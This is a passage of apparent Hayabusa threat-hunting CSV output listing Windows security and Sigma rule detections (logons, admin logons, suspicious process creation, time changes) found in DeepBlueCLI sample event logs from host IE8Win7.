Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x194bb : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x19489,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:49:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x194bb,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:45.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:02.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:55:06.370 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x19153 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1917f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:55:29.463 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x19153,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:57:31.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:49:57.323 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1917f,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:53:53.609 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:11.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:54:23.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:54:29.619 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b15e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2b18a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:55:00.775 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x2b15e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.841 
+09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: 
IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 
0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: 
localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2014-11-22 08:29:47.424 
+09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time 